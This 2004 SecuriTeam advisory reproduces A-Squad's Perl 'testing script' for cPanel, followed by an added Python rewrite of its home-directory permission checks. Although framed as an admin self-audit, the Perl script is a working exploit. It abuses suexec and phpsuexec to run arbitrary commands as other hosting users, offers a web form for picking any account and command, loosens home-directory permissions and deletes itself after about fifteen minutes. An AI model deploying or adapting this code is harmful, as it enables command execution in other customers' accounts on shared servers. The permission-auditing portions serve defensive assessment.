[TOOL] cPanel Multiple Vulnerabilities Testing Script

From: SecuriTeam (support_at_securiteam.com)
Date: 05/24/04

To: list@securiteam.com
Date: 24 May 2004 20:05:01 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      cPanel Multiple Vulnerabilities Testing Script
    ------------------------------------------------------------------------

    SUMMARY

    DETAILS

    A-Squad has built a simple-to-use Perl script that administrators can run
    on their own server to verify whether their cPanel installation is exposed
    to several known points of attack.

    Testing Script:
    #!/usr/bin/perl -w
    # PROGRAM: tests.pl
    # AUTHORS: Rob Brown (rob@asquad.com)
    # PURPOSE: Detect possible vulnerabilities
    #
    # DISCLAIMER:
    # THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
    # IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
    # USE AT YOUR OWN RISK.
    #
    # For secure cpanel hosting, visit A-Squad.Com

    use strict;
    use CGI ':standard';

    # Accept a query string on the command line so the script also runs outside a web server.
    if (my $query = shift) {
      $ENV{QUERY_STRING} = $query;
      $ENV{REQUEST_METHOD} = "GET";
    }
    my $q = new CGI;

    my @users = ();
    my $me = "";
    my $default_command = "id -a";
    my $dummy = "/tmp/tests";

    $| = 1;
    print start_html("System Check");

    my $action = "cpanel.php";
    my $secure = 1;   # cleared by any FAILED check
    my $locked = 1;   # cleared when $HOME is traversable by other users
    my $common = 0;   # set when running as a shared low UID
    my $cpanel = 0;   # cPanel version string, or 0 when not installed
    my $canexe = 0;   # set when a command could be executed as another user

    print qq{<center><a href=http://www.a-squad.com/><img src=http://www.a-squad.com/Abanner.jpg border=0 alt="ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting"></a></center>\n};
    print "<ol>Performing white box security audit...\n";
    if (-d "/usr/local/cpanel") {
      chomp($cpanel = `/usr/local/cpanel/cpanel -V`);
      print "<li><font color=green>PASSED</font>: cPanel INSTALLED ($cpanel)\n";
    } else {
      print "<li><font color=red>FAILED</font>: cPanel NOT INSTALLED\n";
      print "<a href=http://www.a-squad.com/audit/explain1.html>Explain</a>\n";
    }

    # A real UID below 500 means web scripts run as a system account that may be shared between customers.
    my $uid = $<;
    if ($uid < 500) {
      print "<li><font color=red>FAILED</font>: Privileged UID Vulnerability Check ($uid)\n";
      print "<a href=http://www.a-squad.com/audit/explain2.html>Explain</a>\n";
      my $nam = getpwuid $uid;
      if ($nam eq "nobody") {
        print "<li><font color=red>FAILED</font>: nobody execution\n";
        print "<a href=http://www.a-squad.com/audit/explain3.html>Explain</a>\n";
        $secure = 0;
      } else {
        print "<li><font color=green>PASSED</font>: User $nam ($uid) is probably not shared\n";
      }
      $common = 1;
    } else {
      print "<li><font color=green>PASSED</font>: Privileged UID Vulnerability Check ($uid)\n";
    }

    # Collect the unprivileged accounts and work out whose home directory we are running from.
    setpwent;
    while (my ($name,$passwd,$uid,$gid,
               $quota,$comment,$gcos,$dir) = getpwent) {
      if ($uid >= 500) {
        push @users, $name;
        if ($ENV{PWD} =~ m%^\Q$dir\E/%) {
          $me = $name;
          $ENV{HOME} = $dir;
        }
      }
    }

    # Permission-bit checks on $HOME (1 = o+x, 4 = o+r, 32 = g+r, 8 = g+x).
    if ($me && $ENV{HOME} &&
        -d $ENV{HOME}) {
      my $mode = (stat _)[2];
      if ($mode & 1) {
        print "<li><font color=red>FAILED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
        print "<a href=http://www.a-squad.com/audit/explain4.html>Explain</a>\n";
        $secure = 0;
        $locked = 0;
      } else {
        print "<li><font color=green>PASSED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
      }
      if ($mode & 4) {
        print "<li><font color=red>FAILED</font>: Simple \$HOME Scanning [$ENV{HOME}]\n";
        print "<a href=http://www.a-squad.com/audit/explain5.html>Explain</a>\n";
        $secure = 0;
      } else {
        print "<li><font color=green>PASSED</font>: Simple \$HOME Scanning [$ENV{HOME}]\n";
      }
      if ($mode & 32) {
        print "<li><font color=red>FAILED</font>: Group \$HOME Scanning [$ENV{HOME}]\n";
        print "<a href=http://www.a-squad.com/audit/explain6.html>Explain</a>\n";
        $secure = 0;
      } else {
        print "<li><font color=green>PASSED</font>: Group \$HOME Scanning [$ENV{HOME}]\n";
      }
      $mode = (stat "$ENV{HOME}/..")[2];
      if ($mode & 4) {
        print "<li><font color=red>FAILED</font>: Root /home scanning\n";
        print "<a href=http://www.a-squad.com/audit/explain11.html>Explain</a>\n";
        $secure = 0;
      } else {
        print "<li><font color=green>PASSED</font>: Root /home scanning\n";
      }
      $mode = (stat "$ENV{HOME}/public_html")[2];
      if (!$locked && $mode & 1) {
        print "<li><font color=red>FAILED</font>: Simple WEBROOT Protection\n";
        print "<a href=http://www.a-squad.com/audit/explain7.html>Explain</a>\n";
      } else {
        print "<li><font color=green>PASSED</font>: Simple WEBROOT Protection\n";
      }
      my $pubg = (stat _)[5];
      if ($common && !$locked and
          ($(==$pubg && ($mode & 8)) ||
           ($mode & 1)) {
        print "<li><font color=red>FAILED</font>: Real WEBROOT Protection\n";
        print "<a href=http://www.a-squad.com/audit/explain8.html>Explain</a>\n";
        $secure = 0;
      } else {
        print "<li><font color=green>PASSED</font>: Real WEBROOT Protection\n";
      }
    } else {
      print "<li><font color=red>FAILED</font>: Unable to locate unprivileged homedir\n";
    }

    my $command = $q->param("command") || $default_command;
    my $who = $q->param("username") || $me;
    if ($cpanel && $common) {
      # Shared UID: test whether suexec will run a command as another account.
      if ($command and $who) {
        mkdir $dummy, 0755;
        chdir $dummy;
        symlink("/usr/local/cpanel","cpanel");
        my $dir = (getpwnam $who)[7];
        open (DUMMY,">SafeFile.pm");
        $ENV{HOME} = $dir;
        print DUMMY qq{chdir "$dir";warn "\n";\nexec <<RUN$$;\n$command\nRUN$$\n};
        close DUMMY;
        my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`;
        chdir "/var/tmp";
        system("rm","-rf",$dummy);
        if ($out) {
          print "<li><font color=red><b>FAILED</b></font>: SUEXEC <code>mod_php</code> Exploit Test\n";
          print "<a href=http://www.a-squad.com/audit/explain9.html>Explain</a>\n";
          print "<pre>EXEC [$command] as [$who]:\n";
          $out =~ s/&/&amp;/g;
          $out =~ s/</&lt;/g;
          print $out,"</pre>\n";
          $canexe = 1;
        } else {
          print "<li><font color=green>PASSED</font>: SUEXEC <code>mod_php</code> Exploit Test\n";
        }
      }
    } elsif ($cpanel && !$common) {
      # Per-user UID: test whether the PHP CGI honours PATH_TRANSLATED for a file outside the web root.
      my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php 2>&1`;
      if ($probe =~ /phpinfo\(\)/) {
        print "<li><font color=red><b>FAILED</b></font>: SUEXEC <code>mod_phpsuexec</code> Exploit Test\n";
        print "<a href=http://www.a-squad.com/audit/explain10.html>Explain</a>\n";
        $canexe = 1;
        $secure = 0;
        print "<pre>EXEC [$command] as [$who]:\n";
        my $out = `$command 2>&1`;
        $out =~ s/&/&amp;/g;
        $out =~ s/</&lt;/g;
        print $out,"</pre>\n";
        if ($who ne $me) {
          print "Submit again to switch to another user...<br>\n";
          my @guess = qw(/index.php /forum/index.php /forums/index.php);
          my $rand = $guess[rand @guess];
          $action = "/~$who$rand/~$me/cpanel.php";
          system "chmod o+x $ENV{HOME}";
        }
      } else {
        print "<li><font color=green>PASSED</font>: SUEXEC <code>mod_phpsuexec</code> Exploit Test\n";
      }
    }
    if ($cpanel) {
      if ($secure) {
        print "<li><font color=green>PASSED</font>: Congratulations, your cPanel configuration is secure!\n";
      } else {
        print "<li><font color=red>FAILED</font>: One or more insecure cPanel configurations were detected. Visit <a href=http://www.a-squad.com/>A-Squad.Com</a> for details on where to find more secure cPanel hosting.\n";
      }
    }
    print "</ol>";
    # Only show the re-run form when a command could actually be executed.
    print
      start_form(-method => "GET",-action => $action,-name=>"f"),
      "Username: ",
      popup_menu
        (-name => "username",
         -values => [ sort @users ],
         -default => $who,
         ),
      br,
      "Password: (not required)",br,
      "Command: ",
      textfield(-name => "command",-value=> $command),
      br,
      submit(-value=> "Test Execution"),
      end_form,
      "\n<script>f.command.focus()</script>\n"
        if $canexe;
    print end_html;
    # Remove this script once it is older than about 15 minutes (0.01 days).
    -M$0>0.01&&unlink$0;
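
    As an added illustration (not part of the advisory or of the A-Squad script), the $HOME permission checks performed above, rewritten in Python as an audit function that returns results instead of printing HTML, so it can run from cron or a monitoring job. The check names, the `audit_home_modes`, `audit_home` and `demo` functions, and the constructed sample directory layout are assumptions of this example.

```python
import os
import stat
import tempfile

def audit_home_modes(home_mode, parent_mode, pubhtml_mode,
                     shared_uid=False, pubhtml_gid=None, proc_gid=None):
    """Map the script's mode-bit tests to {check_name: passed}.

    home_mode / parent_mode / pubhtml_mode are st_mode values of $HOME, its
    parent directory (e.g. /home) and $HOME/public_html. shared_uid is True
    when web scripts run as a shared low UID such as 'nobody'; pubhtml_gid
    and proc_gid are the group of public_html and the auditor's effective GID.
    """
    home_x = bool(home_mode & stat.S_IXOTH)  # others may traverse $HOME
    results = {
        # 'Stealth Snoop': o+x on $HOME lets any local user open files by name
        "stealth_snoop": not home_x,
        # o+r / g+r on $HOME let others list its contents
        "simple_home_scanning": not (home_mode & stat.S_IROTH),
        "group_home_scanning": not (home_mode & stat.S_IRGRP),
        # o+r on the parent (/home) lets anyone enumerate account names
        "root_home_scanning": not (parent_mode & stat.S_IROTH),
        # the web root checks only matter once $HOME itself is traversable
        "simple_webroot": not (home_x and pubhtml_mode & stat.S_IXOTH),
    }
    same_group = pubhtml_gid is not None and pubhtml_gid == proc_gid
    results["real_webroot"] = not (shared_uid and home_x and (
        (same_group and pubhtml_mode & stat.S_IXGRP) or pubhtml_mode & stat.S_IXOTH))
    return results

def audit_home(home, shared_uid=False):
    """Run the checks against a real directory tree."""
    pub = os.stat(os.path.join(home, "public_html"))
    parent = os.stat(os.path.join(home, os.pardir))
    return audit_home_modes(os.stat(home).st_mode, parent.st_mode, pub.st_mode,
                            shared_uid, pub.st_gid, os.getegid())

def demo():
    """Constructed sample: a 0o711 home under a 0o755 parent, the layout the advisory flags."""
    with tempfile.TemporaryDirectory() as base:
        home = os.path.join(base, "alice")
        os.makedirs(os.path.join(home, "public_html"))
        os.chmod(base, 0o755)
        os.chmod(home, 0o711)
        os.chmod(os.path.join(home, "public_html"), 0o755)
        return audit_home(home, shared_uid=True)

if __name__ == "__main__":
    for check, ok in demo().items():
        print(("PASSED" if ok else "FAILED") + ": " + check)
```

    A fully locked-down layout (home 0o710 or tighter, parent without o+r) passes every check; the sample layout fails stealth_snoop, root_home_scanning and both webroot checks.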

    ADDITIONAL INFORMATION

    The information has been provided by Rob Brown <rob@asquad.com>.

    The original article can be found at: http://www.a-squad.com/audit/

